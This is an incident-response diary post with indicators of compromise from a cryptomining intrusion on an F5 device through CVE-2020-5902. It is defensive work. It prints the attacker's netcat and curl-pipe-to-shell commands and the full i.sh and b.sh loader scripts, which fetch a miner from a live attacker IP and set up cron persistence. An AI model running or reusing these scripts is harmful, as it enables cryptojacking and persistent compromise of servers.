A few IoCs related to CVE-2020-5902
I know I am a bit late to the game, but a couple of weeks ago I responded to an incident resulting from an F5 compromise related to CVE-2020-5902. As I responded I captured a number if indicators of compromise. While I have not had a lot of time to dig into them, hopefully they will be of use to somebody.
The F5 vulnerability, CVE-2020-5902 was announced, and patches and workarounds made available, by F5 on June 30, 2020. This was a CVSS score 10 which essentially meant that if the management interface of the F5 was exposed to the Internet it was trivial to exploit.
On this particular F5, probes for the presence of the vulnerability began on July 3, 2020 and over the course of the subsequent 4 days the device was probed for vulnerability to CVE-2020-5902 2561 times from 364 unique IPs.
The first detectable exploit was executed against the F5 on July 4, 2020. Exploits continued to be executed against the F5 a number of times over the next few days. It is hard to gauge the effectiveness of these exploits but there is no indication that any of these exploits achieved an effective foothold in the F5.
The first detectable foothold in the F5 was on July 6, 2020. As shown in an earlier diary an alias was used to get access to a shell which was used to execute:
nc 217.12.199.179 9999
which resulted in the execution of:
curl 217.12.199.179/i.sh | sh
As of writing 212.12.199.179 is still up and is still serving up the shell scripts related to this attack.
Here are the contents of i.sh
SHA256 - 34e0ad00a23762da270ad5a352d1e523f45a685b4a4931ae02973ecef79140c5
https://www.virustotal.com/gui/file/34e0ad00a23762da270ad5a352d1e523f45a685b4a4931ae02973ecef79140c5/detection
#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload
LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
LDR="wget -q -O -"
fi
WGET="wget -O"
if [ -s /usr/bin/curl ]; then
WGET="curl -o"
fi
if [ -s /usr/bin/wget ]; then
WGET="wget -O"
fi
DIR="/tmp"
if [ -e "/tmp/bigip" ]; then
if [ -w "/tmp/bigip" ] && [ ! -d "/tmp/bigip" ]; then
if [ -x "$(command -v md5sum)" ]; then
sum=$(md5sum /tmp/bigip | awk '{ print $1 }')
echo $sum
case $sum in
fa3cf35e7e83175f395a5b6d35fd456d)
echo "bigip OK"
;;
*)
echo "bigip wrong"
rm -rf /tmp/bigip
sleep 1
;;
esac
fi
echo "P OK"
else
DIR=$(mktemp -d)/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
else
if [ -d "/var/tmp" ]; then
DIR="/var/tmp"
fi
echo "P NOT EXISTS"
fi
download() {
if [ -x "$(command -v md5sum)" ]; then
sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
echo $sum
case $sum in
fa3cf35e7e83175f395a5b6d35fd456d)
echo "bigip OK"
;;
*)
echo "bigip wrong"
download2
;;
esac
else
echo "No md5sum"
download2
fi
}
download2() {
$WGET $DIR/bigip https://bitbucket.org/sozmon3n3/git/raw/master/bigip
chmod +x $DIR/bigip
if [ -x "$(command -v md5sum)" ]; then
sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
echo $sum
case $sum in
fa3cf35e7e83175f395a5b6d35fd456d)
echo "bigip OK"
;;
*)
echo "bigip wrong"
download3
;;
esac
else
echo "No md5sum"
download3
fi
}
download3() {
$WGET $DIR/bigip http://217.12.199.179/bigip
chmod +x $DIR/bigip
if [ -x "$(command -v md5sum)" ]; then
sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
echo $sum
case $sum in
fa3cf35e7e83175f395a5b6d35fd456d)
echo "bigip OK"
;;
*)
echo "bigip wrong"
;;
esac
else
echo "No md5sum"
fi
}
download
SKL=b $DIR/bigip
crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
echo "cron good"
else
(
crontab -l 2>/dev/null
echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
) | crontab -
fi
i.sh adds a recurring cron job which executes a script, b.sh from the same IP.
Here are the contents of b.sh. SHA-256 9994a3ab51521ee54902826d46de3f8c541e625873f10aec2568dd51ddf78f9c
https://www.virustotal.com/gui/file/9994a3ab51521ee54902826d46de3f8c541e625873f10aec2568dd51ddf78f9c/detection
#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload
LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
LDR="wget -q -O -"
fi
crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
echo "cron good"
else
(
crontab -l 2>/dev/null
echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
) | crontab -
fi
i.sh also downloaded an executable called bigip to /var/tmp which launched a process (daemon) on the F5, /tmp/bigipdaemon.
c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76 bigip
https://www.virustotal.com/gui/file/c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76/detection
517168df462fd33d5946f8cc6a09090d1dfdac19b10ac8ef8e15e4583557749d bigipdaemon
https://www.virustotal.com/gui/file/517168df462fd33d5946f8cc6a09090d1dfdac19b10ac8ef8e15e4583557749d/detection
The files are a cryptominer which mines cryptocurrency on behalf of the attacker. The firewall logs clearly show the cryptominer communicating to the IP in the Ukraine where the shell scripts were downloaded from.
Besides the IP associated with the cryptomining the attacker also communicated with 9 other Ips.
Cryptominer IPs
destination_address destination_port Country
217.12.199.179 80 Ukraine
Other associated IPs:
destination_address destination_port Country
193.26.217.129 80 Russia
193.53.127.188 80 Russia
213.226.114.20 80 Russia
213.32.10.148 80 France
45.8.228.49 80 Russia
5.23.52.131 80 Russia
62.109.25.117 80 Russia
95.142.44.164 80 Russia
217.8.117.137 80 Russia
I hope to get some time in the next few weeks to dig into this further, but hopefully this is of some use to someone in the meantime. If anyone has any more related IoCs, please include them in the comments or send them on via the ISC contact page and I will update this diary with the new findings.
-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)
Comments
Unfortunatly, we do do not have access to any deeper logs. So the F5 was patched, reviewed and all uploaded TLS-certificates were renewed and the (may be) compromised old ones revoked. The private keys for the old certs were also uploaded before. I would advice anyone with any indicator of compromise to do as well. If anyone has further suggestions, please leave a comment here.
Thanks,
Ron
Anonymous
Jul 22nd 2020
4 years ago